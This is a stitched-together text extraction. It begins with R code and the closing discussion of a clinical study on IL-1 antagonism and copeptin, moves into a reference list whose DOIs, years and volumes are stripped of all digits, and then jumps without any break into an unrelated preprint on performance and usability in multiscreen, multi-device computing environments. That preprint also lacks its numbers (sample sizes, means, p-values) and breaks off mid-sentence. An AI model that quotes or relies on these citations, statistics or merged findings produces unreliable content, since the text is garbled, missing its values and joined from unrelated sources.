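summary(fit_treatment)

# Subgroup analysis: linear regression with a treatment-by-subgroup interaction,
# adjusted for baseline copeptin, treatment day, and sex (one model per subgroup
# variable; chronic low-grade inflammation is shown here as an example).
fit_subgroup <- lm(log(copeptin) ~ treatment * low_grade_inflammation +
                     baseline_copeptin + day + sex, data = visits)
summary(fit_subgroup)  # the interaction term tests for a differential anakinra effect
```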
receptors in the pancreas ( ). in summary, the available evidence suggests a bidirectional role of obesity for the secretion of avp/copeptin. according to our study, however, chronic low-grade inflammation is probably not the driving force behind the elevation of avp/copeptin levels and other mechanisms such as sympathetic nervous system activation must be investigated in future studies. strengths of our study are first that we used data from interventional studies, one being a placebo-controlled, double-blinded trial, which spares questions about association vs causality. second, we investigated short-term as well as longer-term effects of il- antagonism on avp/copeptin levels. third, both studies had similar eligibility criteria and visit procedures. in both trials patients had to be fasting and refrain from drinking water before the morning blood samplings, rendering reliable copeptin measurements. limitations of our study include that this is a secondary analysis, which always bears the risk of insufficient power for this endpoint. nevertheless, no tendency for a decrease in copeptin levels can be observed in our data. alternatively, another cytokine (e.g. tumor necrosis factor α) or cell nutrients (e.g. free fatty acids, glucose) may regulate avp. thus, anakinra alone might not be sufficiently potent to inhibit the drive of the other (unknown) factors on avp/copeptin secretion. in conclusion, the observed elevation of avp/copeptin levels in patients with metabolic syndrome is not due to systemic chronic activation of the il- system and other factors should be investigated to elucidate regulators of avp/copeptin levels.
declaration of interest
mcc received speaking honoraria from thermo fisher ag, the manufacturer of the copeptin assay. the remaining authors have nothing to disclose.
funding
mp and mcc are supported by grants awarded from the swiss national science foundation (mcc: snf- ; mp: snf- ).
acknowledgements
the authors thank all patients for their participation, the staff of the laboratory and the department of endocrinology, diabetology & metabolism of the university hospital basel and of the kantonsspital aarau. the authors extend a special thanks to the study nurses for their most helpful support during the study.
references
eckel rh, grundy sm & zimmet pz. the metabolic syndrome. lancet – . (https://doi.org/ . /s - ( ) - ) melander o. vasopressin, from regulator to disease predictor for diabetes and cardiometabolic risk. annals of nutrition and metabolism (supplement ) – . (https://doi.org/ . / ) fenske wk, schnyder i, koch g, walti c, pfister m, kopp p, fassnacht m, strauss k & christ-crain m. release and decay kinetics of copeptin vs avp in response to osmotic alterations in healthy volunteers.
journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) enhörning s, wang tj, nilsson pm, almgren p, hedblad b, berglund g, struck j, morgenthaler ng, bergmann a, lindholm e, et al. plasma copeptin and the risk of diabetes mellitus. circulation – . (https://doi.org/ . / circulationaha. . ) abbasi a, corpeleijn e, meijer e, postmus d, gansevoort rt, gans rob, struck j, hillege hl, stolk rp, navis g, et al. sex differences in the association between plasma copeptin and incident type diabetes: the prevention of renal and vascular endstage disease (prevend) study. diabetologia – . (https:// doi.org/ . /s - - -x) enhörning s, bankir l, bouby n, struck j, hedblad b, persson m, morgenthaler ng, nilsson pm & melander o. copeptin, a marker of vasopressin, in abdominal obesity, diabetes and microalbuminuria: the prospective malmö diet and cancer study cardiovascular cohort. international journal of obesity – . (https://doi. org/ . /ijo. . ) asferg cl, andersen ub, linneberg a, goetze jp & jeppesen jl. copeptin, a surrogate marker for arginine vasopressin secretion, is associated with higher glucose and insulin concentrations but not higher blood pressure in obese men. diabetic medicine – . (https://doi.org/ . /dme. ) then c, kowall b, lechner a, meisinger c, heier m, koenig w, peters a, rathmann w & seissler j. plasma copeptin is associated with type diabetes in men but not in women in the population- based kora f study. acta diabetologica – . (https:// doi.org/ . /s - - - ) roussel r, boustany r el, bouby n, potier l, fumeron f, mohammedi k, balkau b, tichet j, bankir l, marre m, et al. plasma copeptin, avp gene variants, and incidence of type diabetes in a cohort from the community. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) vintilă m, gheorghiu ml, caragheorgheopol a, baculescu n, lichiardopol c, badiu c, coculescu m, grigorescu f & poiană c. increased copeptin levels in metabolic syndrome from a romanian population. journal of medicine and life – . riphagen ij, boertien we, alkhalaf a, kleefstra n, gansevoort rt, groenier kh, van hateren kjj, struck j, navis g, bilo hjg, et al. copeptin, a surrogate marker for arginine vasopressin, is associated with cardiovascular and all-cause mortality in patients with type diabetes (zodiac- ). diabetes care – . (https:// doi.org/ . /dc - ) zellweger c, wildi k, twerenbold r, reichlin t, naduvilekoot a, neuhaus jd, balmelli c, gabutti m, afify aal, ballarino p, et al. use of copeptin and high-sensitive cardiac troponin t for diagnosis and prognosis in patients with diabetes mellitus and suspected acute this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /jc. - https://doi.org/ . /circulationaha. . https://doi.org/ . /circulationaha. . https://doi.org/ . /s - - -x https://doi.org/ . /s - - -x https://doi.org/ . /ijo. . https://doi.org/ . /ijo. . https://doi.org/ . /dme. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /dc - https://doi.org/ . /dc - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . 
/ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : myocardial infarction. international journal of cardiology – . (https://doi.org/ . /j.ijcard. . . ) enhörning s, hedblad b, nilsson pm, engström g & melander o. copeptin is an independent predictor of diabetic heart disease and death. american heart journal – .e . (https://doi. org/ . /j.ahj. . . ) gallo-payet n & guillon g. regulation of adrenocortical function by vasopressin. hormone and metabolic research – . (https://doi.org/ . /s- - ) scott lv & dinan tg. vasopressin and the regulation of hypothalamic-pituitary-adrenal axis function: implications for the pathophysiology of depression. life sciences – . (https://doi.org/ . /s - ( ) - ) grazzini e, breton c, derick s, andres m, raufaste d, rickwaert f, boccara g, colson p, guérineau nc, serradeil-le gal c, et al. vasopressin receptors in human adrenal medulla and pheochromocytoma. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jcem. . . ) hems da & whitton pd. stimulation by vasopressin of glycogen breakdown and gluconeogenesis in the perfused rat liver. biochemical journal – . (https://doi.org/ . /bj ) hiroyama m, aoyagi t, fujiwara y, birumachi j, shigematsu y, kiwaki k, tasaki r, endo f & tanoue a. hypermetabolism of fat in v a vasopressin receptor knockout mice. molecular endocrinology – . (https://doi.org/ . /me. - ) filep j & rosenkranz b. mechanism of vasopressin-induced platelet aggregation. thrombosis research – . (https://doi. org/ . / - ( ) - ) maturi mf, martin se, markle d, maxwell m, burruss cr, speir e, greene r, ro ym, vitale d & green mv. coronary vasoconstriction induced by vasopressin. production of myocardial ischemia in dogs by constriction of nondiseased small vessels. circulation – . (https://doi.org/ . / .cir. . . ) enhörning s, struck j, wirfält e, hedblad b, morgenthaler ng & melander o. plasma copeptin, a unifying factor behind the metabolic syndrome. journal of clinical endocrinology & metabolism e –e . (https://doi.org/ . /jc. - ) wannamethee sg, welsh p, papacosta o, lennon l, whincup ph & sattar n. copeptin, insulin resistance, and risk of incident diabetes in older men. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) barchetta i, enhörning s, cimini fa, capoccia d, chiappetta c, cristofano c di, silecchia g, leonetti f, melander o & cavallo mg. elevated plasma copeptin levels identify the presence and severity of non-alcoholic fatty liver disease in obesity. bmc medicine . (https://doi.org/ . /s - - - ) ridker pm, howard cp, walter v, everett b, libby p, hensen j, thuren t & cantos pilot investigative group. effects of interleukin- β inhibition with canakinumab on hemoglobin a c, lipids, c-reactive protein, interleukin- , and fibrinogen a phase iib randomized, placebo-controlled trial. circulation – . (https://doi.org/ . / circulationaha. . ) larsen cm, faulenbach m, vaag a, vølund a, ehses ja, seifert b, mandrup-poulsen t & donath my. interleukin- -receptor antagonist in type diabetes mellitus. new england journal of medicine – . (https://doi.org/ . /nejmoa ) ridker pm, everett bm, thuren t, macfadyen jg, chang wh, ballantyne c, fonseca f, nicolau j, koenig w, anker sd, et al. antiinflammatory therapy with canakinumab for atherosclerotic disease. new england journal of medicine – . (https://doi.org/ . /nejmoa ) nakatsuru k, ohgo s, oki y & matsukura s. 
interleukin- (il- ) stimulates arginine vasopressin (avp) release from superfused rat hypothalamo-neurohypophyseal complexes independently of cholinergic mechanism. brain research – . (https://doi. org/ . / - ( ) -v) watanobe h & takebe k. intrahypothalamic perfusion with interleukin- -beta stimulates the local release of corticotropin- releasing hormone and arginine vasopressin and the plasma adrenocorticotropin in freely moving rats: a comparative perfusion of the paraventricular nucleus and the median eminence. neuroendocrinology – . (https://doi. org/ . / ) raber j, pich em, koob gf & bloom fe. il- beta potentiates the acetylcholine-induced release of vasopressin from the hypothalamus in vitro, but not from the amygdala. neuroendocrinology – . (https://doi.org/ . / ) wahab f, tazinafo lf, cárnio ec, aguila fa, batalhão me & rocha mj. interleukin- receptor antagonist decreases cerebrospinal fluid nitric oxide levels and increases vasopressin secretion in the late phase of sepsis in rats. endocrine – . (https://doi. org/ . /s - - - ) ebrahimi f, urwyler sa, straumann s, doerpfeld s, bernasconi l, neyer p, schuetz p, mueller b, donath my & christ-crain m. il- antagonism in men with metabolic syndrome and low testosterone: a randomized clinical trial. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) urwyler sa, schuetz p, ebrahimi f, donath my & christ-crain m. interleukin- antagonism decreases cortisol levels in obese individuals. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) friedewald wt, levy ri & fredrickson ds. estimation of the concentration of low-density lipoprotein cholesterol in plasma, without use of the preparative ultracentrifuge. clinical chemistry – . (https://doi.org/ . / clinchem/ . . ) saleem u, khaleghi m, morgenthaler ng, bergmann a, struck j, mosley th & kullo ij. plasma carboxy-terminal provasopressin (copeptin): a novel marker of insulin resistance and metabolic syndrome. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) kahn bb & flier js. obesity and insulin resistance. journal of clinical investigation – . (https://doi.org/ . / jci ) monteiro r & azevedo i. chronic inflammation in obesity and the metabolic syndrome. mediators of inflammation . (https://doi.org/ . / / ) aharon-hananel g, jörns a, lenzen s, raz i & weksler-zangen s. antidiabetic effect of interleukin- β antibody therapy through β-cell protection in the cohen diabetes – sensitive rat. diabetes – . (https://doi.org/ . /db - ) donath my. inflammation as a sensor of metabolic stress in obesity and type diabetes. endocrinology – . (https://doi. org/ . /en. - ) davy kp & orr js. sympathetic nervous system behavior in human obesity. neuroscience and biobehavioral reviews – . (https://doi.org/ . /j.neubiorev. . . ) schrier rw & goldberg jp. the physiology of vasopressin release and the pathogenesis of impaired water excretion in adrenal, thyroid, and edematous disorders. yale journal of biology and medicine – . loncar g, von haehling s, tahirovic e, inkrot s, mende m, sekularac n, lainscak m, apostolovic s, putnikovic b, edelmann f, et al. effect of beta blockade on natriuretic peptides and copeptin in elderly patients with heart failure and preserved or reduced ejection fraction: results from the cibis-eld trial. clinical biochemistry – . (https://doi.org/ . /j. clinbiochem. . . ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . 
aktimur r, mete t, cetinkunar s, yaman m, beton o, avci e, erdem h & yildirim k. copeptin, a marker of vasopressin, decreases significantly in early state after bariatric surgery. endocrine abstracts ep . (https://doi.org/ . /endoabs. .ep ) whitton pd, rodrigues lm & hems da. stimulation by vasopressin, angiotensin and oxytocin of gluconeogenesis in hepatocyte suspensions. biochemical journal – . (https://doi.org/ . /bj ) keppens s & de wh. the nature of the hepatic receptors involved in vasopressin-induced glycogenolysis. bba – series general subjects – . (https://doi.org/ . / - ( ) - ) abu-basha ea, yibchok-anun s & hsu wh. glucose dependency of arginine vasopressin-induced insulin and glucagon release from the perfused rat pancreas. metabolism: clinical and experimental – . (https://doi.org/ . /meta. . )
received in final form june. accepted july. accepted manuscript published online july.
performance, workload, and usability in a multiscreen, multi-device, information-rich environment
a peer-reviewed version of this preprint was published in peerj on september .
view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. saleem jj, weiler dt. . performance, workload, and usability in a multiscreen, multi-device, information-rich environment. peerj computer science :e https://doi.org/ . /peerj-cs.
performance, workload, and usability in a multiscreen, multi-device, information-rich environment
jason j. saleem , * and dustin t. weiler ,
department of industrial engineering, j.b. speed school of engineering, university of louisville, louisville, kentucky, usa
center for ergonomics, university of louisville, louisville, ky, usa
department of industrial and systems engineering, university of wisconsin-madison, madison, wisconsin, usa
corresponding author: jason j. saleem, phd, department of industrial engineering, j.b. speed school of engineering, university of louisville, louisville, ky, usa, tel: + , fax: + , email: jason.saleem@louisville.edu
abstract
potential benefits of multiscreen and multiple device environments were assessed using three different computing environments. a single factor, within-subject study was conducted with engineering students in a laboratory experiment. three levels for the computing environment factor included one with a desktop computer with a single monitor (control, condition a); one with a desktop with dual monitors, as well as a single tablet computer (condition b); and one with a desktop with a single monitor, as well as two tablet computers (condition c). there was no statistically significant difference in efficiency or workload when completing scenarios for the three computing environments.
however, a dual monitor desktop with a single tablet computer (b) was the ideal computing environment for the information-rich engineering problem given to participants, supported by significantly fewer errors compared to condition c and significantly higher usability ratings compared to conditions a and c. a single desktop monitor with two tablet computers (c) did not provide any advantage compared to a single desktop monitor (a). . introduction as having more than one computing device and/or monitors is becoming more feasible for individuals, a future trend is the of adoption of a multiscreen and multiple device approach to cope with distractions and multiple tasks. although this may seem counterintuitive, more screens and possibly more devices may help focus one’s attention rather than serve as a distraction, making multiple tasks viewable at a glance across multiple device screens (thompson, ). assuming each device has a different primary purpose, the additional screens may begin to approximate some of the inherent affordances of paper. that is, spreading out papers on a desk lets one’s eyes easily scan, which is a property hard to replicate on a single computer screen. thus, coordination of multiple computing devices and screens is a strategy that may potentially improve one’s performance in an information-rich environment by focusing their attention and reducing their mental workload. combining multiple screens and information devices has recently been studied qualitatively, in the field (jokela, ojala, & olsson, ). however, little quantitative experimentation has been done as to how a multi-device setup might affect task performance, which is the main objective of this study. the study described in this paper is a natural evolution of a previous study that involved paper-based workarounds to using the electronic health record (ehr) (saleem et al., ). in this study, we found that paper served as an important tool and assisted healthcare employees in their work. in other cases, paper use circumvented the intended ehr design, introduced potential gaps in documentation, and generated possible paths to medical error. investigating these paper processes helped us understand how the current exam room computing and ehr were not meeting the needs of the clinicians. the “forgotten” power of paper, including its ability to serve as a reliable cognitive memory aid and to help focus attention on important information, were lost as ehrs began to take shape. today, a multiscreen and multiple device work environment is becoming a trend. how to optimize the use and coordination of these multiple screens and devices is not known. this type of environment may help simulate the forgotten power of paper by replicating many of the lost affordances of paper-based processes, such as easy visual attention switches across screens, as well as the display of the most important information, separated by function or purpose across screens and devices. the objective of our study was to understand how to optimize this type of multiscreen and multiple device environment for improved user performance and satisfaction, and reduced mental workload. there exists a large body of human-computer interaction (hci) literature on the use of multiple screens, screen sizes, and form factors (e.g., desktop, tablet, smartphone). 
previous studies in academic (anderson, colvin, tobler, & lindsay, ; russell & wong, ) and hospital (poder, godbout, & bellemare, ) settings have demonstrated that performance is improved with the use of two monitors compared to one. for example, participants were quicker on tasks, did the work faster, and performed more work with fewer errors in multiscreen (dual screen) configurations than with a single screen (anderson et al., ). another study demonstrated that users do not tend to treat a second monitor as additional space. that is, participants reported rarely straddling a single window across two monitors. this is consistent with the physical gaps that are often left between monitors. instead, users typically maximize a design to fill one monitor entirely, leaving the other monitor free for other uses (grudin, ). the visual and physical separation between displays requires that users perform visual attention switches between displays (rashid, nacenta, & quigley, ). in one study, the authors utilized a divided attention paradigm to explore the effects of visual separation and physical discontinuities when distributing information across multiple displays. results showed reliable detrimental effects (about a % performance decrement) when information is separated within the visual field, but only when coupled with an offset in depth (tan & czerwinski, ). the optimal monitor size and position has also been studied. one study compared -, -, -, and -inch monitors and found that while participants’ performance was most efficient with the -inch monitor for excel and word tasks, users significantly preferred the -inch monitor (simmons, ). the majority ( %) of participants noted that the -inch monitor was too large or bulky for the average workspace (simmons & manahan, ; simmons, ). a limitation of this study was that screen resolution was not controlled for across the four screen sizes. although there has also been experimentation with very large displays (e.g., -inch monitor), there are several usability issues that are barriers to adopting larger displays, including: losing track of the cursor, distal access to information, window management problems (e.g., windows pop up in unexpected places), task management problems, configuration problems, and failure to leverage the periphery (czerwinski et al., ). therefore, separate smaller displays (e.g., -inch) seems to be advantageous as compared to a single, very large display. in terms of user-preferred position of computer monitors, one study found that participants placed larger displays farther and lower while maintaining the display top at or near eye height (shin & hegde, ). preferred position of the dual displays in landscape arrangement did not differ from that of a single display. therefore, it appears that the preferred display position varies with the vertical dimension of the overall viewable area of the display (shin & hegde, ). in addition to multiple monitors, handheld computers such as tablets and smartphones are becoming much more accessible in the workplace. for example, in clinical care settings, one research team noted that by making the most useful and appropriate data available on multiple devices and by facilitating the visual attention switching between those devices, staff members can efficiently integrate them in their workflow, allowing for faster and more accurate decisions (de backere f. et al., ). 
research on the performance differences with the form factor of handheld computers revealed a significant difference in completion times between the tablet and smart phone screen sizes ( . vs. . cm), but no differences in errors or subjectively assessed cognitive workload (byrd & caldwell, ). these previous studies were useful for understanding how to blend a multiple monitor environment with additional devices, such as tablet computers, for creating multiscreen environments to compare in our study. . methods . study design this research was approved by the institutional review board (irb) at the university of louisville (irb # . ). informed consent was obtained from each participant. the study was conducted in the center for ergonomics lab space at the university of louisville to test the three different computing work areas with engineering students. we used a counterbalanced, within-subject design, with ‘computing environment’ as the single independent variable. the three levels of computing environment are shown in figure . the presentation order of the three work area computing conditions were counterbalanced across the participants to control for a potential carry over learning effect. condition a had a single desktop computer with a - inch monitor (baseline condition). condition b had a desktop with dual -inch monitors, as well as a single tablet computer with a . -inch display. condition c had a desktop with a - inch monitor, as well as two tablet computers, with . inch displays. the -inch monitors were in fixed positions; however, the tablet computers were not fixed or propped up and could be moved based on users’ preferences. a standard keyboard and mouse were used as the input devices for the monitors. the desktop had a windows operating system and the tablets were ipad air ’s with the ios operating system. the input for the ipads were via touch screen and electronic keyboard (no external input devices were connected to the ipads). the same resolution ( x pixels) for the -inch monitors was used for each condition. the resolution of the ipads was x pixels. these three conditions were chosen based on a review of the literature to begin to understand how a multiscreen work area may affect performance and satisfaction in an information-rich environment. ---------------------------------------------- insert figure about here ---------------------------------------------- a previous study found that a -inch monitor is the optimal screen size based on performance and preference (simmons & manahan, ; simmons, ). therefore, a single -inch monitor work area served as a baseline condition (a) for comparison with the multiscreen conditions. several studies have found increased performance for dual-screen users (anderson et al., ; poder et al., ; russell & wong, ); a dual screen set up is part of condition (b). the dual-screens were fixed on the horizontal plane from the user’s perspective since varying screen position by depth was found to result in a performance decrement (tan & czerwinski, ). although pervious research supports the use of dual-screen monitors, it is not known how performance and satisfaction is impacted with the availability of additional screens from the use of mobile technologies. tablet computers were introduced in conditions (b) and (c) rather than other form factors such as smart phones since previous research demonstrated a significant difference in task completion times between the tablet and smart phone screen sizes (byrd & caldwell, ). 
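As a side note on the counterbalanced presentation order mentioned in the study design above, condition order can be rotated across participants so that each ordering of A, B, and C appears roughly equally often. The snippet below is a purely illustrative sketch of such an assignment, not the scheme actually used in the study, and the sample size shown is a placeholder.

```r
# Hypothetical counterbalancing sketch: enumerate all orderings of the three
# conditions and cycle through them across participants.
conditions <- c("A", "B", "C")

orders <- expand.grid(first = conditions, second = conditions, third = conditions,
                      stringsAsFactors = FALSE)
orders <- orders[apply(orders, 1, function(r) length(unique(r)) == 3), ]  # 6 permutations

n_participants <- 12  # placeholder; not the study's sample size
assignment <- orders[rep(seq_len(nrow(orders)), length.out = n_participants), ]
rownames(assignment) <- paste0("P", seq_len(n_participants))
assignment  # one row per participant: presentation order of conditions A, B, C
```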
one tablet computer was introduced in condition (b) to use in conjunction with the dual monitor desktop and two tablets computers were introduced in condition (c) to use on conjunction with a single monitor desktop. conditions (b) and (c) incorporated multiple screens across multiple form factors (desktop monitor and tablet computer) to understand the if multiple screens can help focus (or distract) users’ attention in an information-rich environment (thompson, ). . participants for this study, industrial engineering students ( males, females) participated between march-june . industrial engineering students were chosen based on the flow- charting tasks involved in the session; all students, except for one, had previously learned how to use a process flow chart from an undergraduate course on work design. the one exception was a graduate student with a mathematics undergraduate background. however, she was given an overview of process flow charting technique prior to data collection. participants were between the ages of and years old; the median age was . all participants, with the exception of one, reported little or no previous knowledge of race car driving, which was the application area for the experimental tasks. one participant had a great deal of knowledge about race car driving. ten of the participants currently used a dual-monitor set-up for their personal workstations and all but one participant had experience using tablet computers or ‘ in ’ computers (tablets that convert to a laptop). only one participant reported regularly using an ipad, which were the tablets used as part of this study. . dependent measures we used performance (efficiency and accuracy), workload, and usability as measures to demonstrate improved work area computing. specifically, improved efficiency and accuracy using a certain work area computing condition (a, b, or c), or time to complete tasks and reduction of errors, would suggest that the work area computing set-up better supports the users’ ability to efficiently and effectively complete information-rich tasks. similarly, through improved work area computing set-up, a decrease in mental workload (and thus required attentional resources) was predicted, as measured by the nasa task load index (tlx) (hart & staveland, ). we used unweighted tlx scores as the tlx dimensional weighting procedure has been found to be of limited benefit (hendy, hamilton, & landry, ; nygren, ). finally, an improved work area computing set-up would be expected to score higher on a validated usability survey; we used the computer usability satisfaction questionnaire (csuq) (lewis, ). each of these measures was used to compare the three experimental conditions for work area computing. . scenarios and tasks participants were asked to use flow process charts to document the steps that members of a national association for stock car auto racing (nascar) team perform during a pit stop. participants documented different members of the pit crew for each of the three work area computing conditions a, b, and c. the multiscreen/device conditions b and c can be described as “related parallel use” conditions (jokela et al., ), where participants work on completing a single task using more than one device in parallel. the three members of the pit crew for this experiment were front tire carrier, rear tire carrier, and jack man. participants first watched a demonstration / tutorial video that showed the roles of each member of the pit crew (interstate batteries, ). 
after this orientation, participants experienced each work area computing condition while completing a flow process chart to document a different pit crew member’s tasks while watching an actual pit stop video (armyranger [screen name], ). solutions for the flow process charts for each of the three roles were developed by one of the authors (d.t.w.), who possessed extensive knowledge of nascar racing, prior to the first participant (appendices a-c). we chose this particular pit stop scenario as an example of an information- rich task, where the use of multiple screens was potentially useful. table shows how the information was partitioned across the screens and devices for each condition. ---------------------------------------------- insert table about here ---------------------------------------------- . experimental space the laboratory in the center for ergonomics consisted of a participant room ( sq. ft.) within a larger, main laboratory space ( sq. ft.). the participant room and main laboratory space were connected with a door and a one-way mirror. the experimenter’s station was located just outside of the participant room. morae usability testing software connected the participant’s computer and experiment’s computer and was used to display the tasks and instructions to the participant. morae was also used to video record the direct screen capture of the participant’s interaction with the two desktop monitors. a web cam was used to record the participant’s interaction with the ipads, and was synced with the morae screen capture recording. time to complete the scenarios was automatically captured by morae. . procedure after completing a demographics form, participants were given a brief verbal overview of the purpose of the experiment and then oriented to the experimental space. after watching the pit stop demonstration (tutorial) video, participants completed a flow process chart for a member of the pit crew with the work area computing conditions a, b, and c, (counterbalanced across participants) with the information available to them listed in table . documents and information needed to complete this task, including a blank flow process chart, were provided to the participant by the experimenter though email. after accessing these information items through email, participants could display them as they wished (split screen or toggle between windows to view one at a time) as long as the information items were partitioned across the monitors and devices as prescribed in table . for all three conditions, the flow process chart was always located on monitor as completing the chart was the primary activity. all other information sources in table were supportive of completing the flow process chart. a dimension sheet of the pit stop area was provided so that participants could estimate distance for travel steps in the flow process chart. each of three pit crew roles (tire carrier, rear tire carrier, and jack man) were randomly assigned to the three conditions for each participant. after completing the scenarios for a given condition, participants were given the nasa tlx (computerized version) and csuq (paper- based version) surveys for mental workload and usability, respectively. thus participants completed each survey a total of three times, one for each work area computing condition a, b, and c. 
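Because the study uses unweighted (raw) TLX scores, the composite workload value is simply the mean of the six subscale ratings collected after each condition. A minimal sketch of that computation is shown below; the file and column names are assumptions for illustration, not the study's data files.

```r
# Sketch: unweighted NASA TLX composite = mean of the six subscale ratings.
tlx <- read.csv("tlx_responses.csv")   # hypothetical: one row per participant per condition
subscales <- c("mental", "physical", "temporal", "performance", "effort", "frustration")

tlx$composite <- rowMeans(tlx[, subscales])

# Mean composite workload per computing environment (A, B, C)
aggregate(composite ~ condition, data = tlx, FUN = mean)
```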
after completing the final condition, the debrief session commenced, with the experimenter conducting a semi-structure interview to explore each participant’s experiences with each condition (appendix d). the debrief interview was audio recorded by morae. participants received a $ gift card at the completion of the debrief session as compensation for their time. the entire participation time was scheduled for . hours for each volunteer. . hypotheses based on a review of the literature supporting the use of multiscreen and multi-device computing to improve performance in information-rich environments, as well as the possibility that multiple screens may help focus one’s attention when the information and functions are parsed distinctly across each screen, the following was predicted: hypothesis : participants will perform the scenarios in significantly less time and with significantly fewer errors with conditions b and c as compared to condition a (figure ). hypothesis : participants will experience significantly less mental workload when completing the scenarios with conditions b and c as compared to condition a. hypothesis : participants will rate the usability of the work area computing set-up in conditions b and c significantly higher as compared to condition a. hypothesis : there will be no significant differences for any of the dependent variables between condition b and condition c. . analysis the simulation study followed a single factor, within-subject experimental design. the single factor was ‘computing environment’, with three levels (a, b, c), depicted in figure . analysis of variance (anova) was planned to test for a main effect of ‘computing environment’ on each dependent outcome measures. we planned to use non-parametric statistical testing (i.e., friedman two-way anova) if the normality assumption of anova was violated for a dependent variable. a . level of significance was applied to all statistical tests. qualitative data collected from the debrief interview session were analyzed for recurrent themes across participants. these qualitative data were collected to help explain the quantitative results. . results . performance . . time. mean scenario completion time, with the standard deviation in parentheses, was . sec ( . sec) for condition a, . sec ( . sec) for condition b, and . sec ( . sec) for condition c. anova did not reveal a main effect of computing environment on time. . . accuracy. solutions were used to check the accuracy of each participants flow process charts in terms of errors made. errors included omission errors, incorrect classification of events (e.g., operation vs. transportation), and errors involving the time or distance (for transportation items) for each event. these error counts were treated as ordinal data; median errors were committed by participants when completing scenarios with condition a, median errors with condition b, and median errors with condition c. a friedman two-way anova revealed a main effect of computing environment on errors, x ( ) = . , p = . , unadjusted for ties. post-hoc analysis showed that the difference between conditions b and c was the only significant difference (wilcoxon signed ranks test). . workload the nasa tlx data were not normally distributed for the overall composite score or for any of the six subscales, with the exception of mental demand. therefore, we used non- parametric testing to analyze the workload data. 
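A rough sketch of the analysis strategy described above (repeated-measures ANOVA where normality holds, otherwise the Friedman test with Wilcoxon signed-rank post-hoc comparisons) is given below. The data layout and column names are assumptions for illustration, not the study's actual files.

```r
# Assumed long-format data: one row per participant per condition,
# with columns participant, condition (A/B/C), time, and errors.
dat <- read.csv("outcomes.csv")
dat$participant <- factor(dat$participant)
dat$condition   <- factor(dat$condition)

# Normality check (in practice run per condition or on model residuals)
shapiro.test(dat$time)

# Repeated-measures ANOVA for a sufficiently normal outcome such as time
summary(aov(time ~ condition + Error(participant/condition), data = dat))

# Friedman two-way ANOVA by ranks for a non-normal outcome such as error counts
friedman.test(errors ~ condition | participant, data = dat)

# Post-hoc pairwise Wilcoxon signed-rank tests (e.g., condition B vs condition C)
wide <- reshape(dat[, c("participant", "condition", "errors")],
                idvar = "participant", timevar = "condition", direction = "wide")
wilcox.test(wide$errors.B, wide$errors.C, paired = TRUE)
```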
the friedman two-way anova was used to analyze the overall score and subscales and found no statistically significant differences in workload across the three conditions. a summary of the nasa tlx scores is presented in table . ---------------------------------------------- insert table about here ---------------------------------------------- . usability the csuq is analyzed along an overall score and three subscales, shown in table . item related to error messages and was excluded from the analysis since there were no error messages presented to participants as part of the study scenario. a copy of the complete csuq survey is available in appendix e. we used anova to test for a main effect of computing environment on the system usefulness and information quality subscales. however, the data for overall satisfaction and interface quality failed the normality assumption and so we treated those data as ordinal and used the friedman two-way anova for those two subscales. statistically significant results were found for overall satisfaction, x ( ) = . , p = . , unadjusted for ties; system usefulness, f( , ) = . , p = . ; and interface quality, x ( ) = . , p = . , unadjusted for ties. for system usefulness, post-hoc analysis (tukey pairwise comparisons) revealed that the significant difference is isolated between conditions a and b. condition c is not considered different than a or b. for both overall satisfaction and interface quality, post-hoc analysis (wilcoxon signed rank test) revealed that b is significantly different from a and c. however, a and c are not considered different. ---------------------------------------------- insert table about here ---------------------------------------------- . qualitative results during the debrief interview, of participants expressed a clear preference for the computing environment in condition b (dual monitors and one ipad); participants expressed a clear preference for condition a (single monitor); no participants expressed a preference for condition c (single monitor and two ipads). of the participants who chose the layout in condition b as best, of them explicitly stated that the ipad was unnecessary. conversely, of the participants expressed a clear preference for the ipad in addition to the dual monitors. when asked what an “optimal” computing environment for their work (i.e., not restricted to choosing one of the three conditions), participants indicated they would prefer two desktop monitors. one participant would prefer a single desktop monitor. and one participant indicated, “the more monitors the better”. within these responses, five participants expressed a desire or noted an advantage for having a mobile device in addition to fixed monitors for portability of information (three mentioned tablet computers, one mentioned a smart phone, and one mentioned a laptop). . discussion the results of this investigation into the benefit of using multiple screens and multiple devices were mixed; some of our hypotheses were not supported and others were partially supported. our first hypothesis was that participants would perform the scenarios in significantly less time and with significantly fewer errors with conditions b and c as compared to condition a. while participants, on average, completed scenarios in less time with condition b, there was no statistically significant difference in time to complete scenarios for the three computing environments. 
one statistically significant result for errors was isolated between conditions b and c; participants committed significantly less errors when using condition b compared to c. these results suggest marginal support for our first hypothesis, but only for condition b. condition c was not considered different than the baseline condition a for time and errors. our second hypothesis was that participants would experience significantly less mental workload when completing the scenarios with conditions b and c as compared to condition a. this hypothesis was not supported. there was no statistically significant difference in the nasa tlx scores when completing scenarios for the three computing environments. however, it is worth noting that condition b was scored, on average, as better than the other conditions especially on the ‘mental demand’ and ‘effort’ subscales. the third hypothesis was that participants would rate the usability of the work area computing set-up in conditions b and c significantly higher as compared to condition a. this hypothesis was partially supported. condition b was scored significantly higher for overall usability and interface quality compared to both conditions a and c; as well as significantly higher for system usefulness compared to condition a. however, condition c was not scored significantly higher for any of the csuq scales compared to the baseline condition a. our final hypothesis was that there would be no significant differences for any of the dependent variables between condition b and condition c. this hypothesis was not supported. participants committed significantly fewer errors with condition b compared to condition c. they also rated the overall usability and interface quality as significantly better for the computing environment condition b compared to condition c. . key findings a 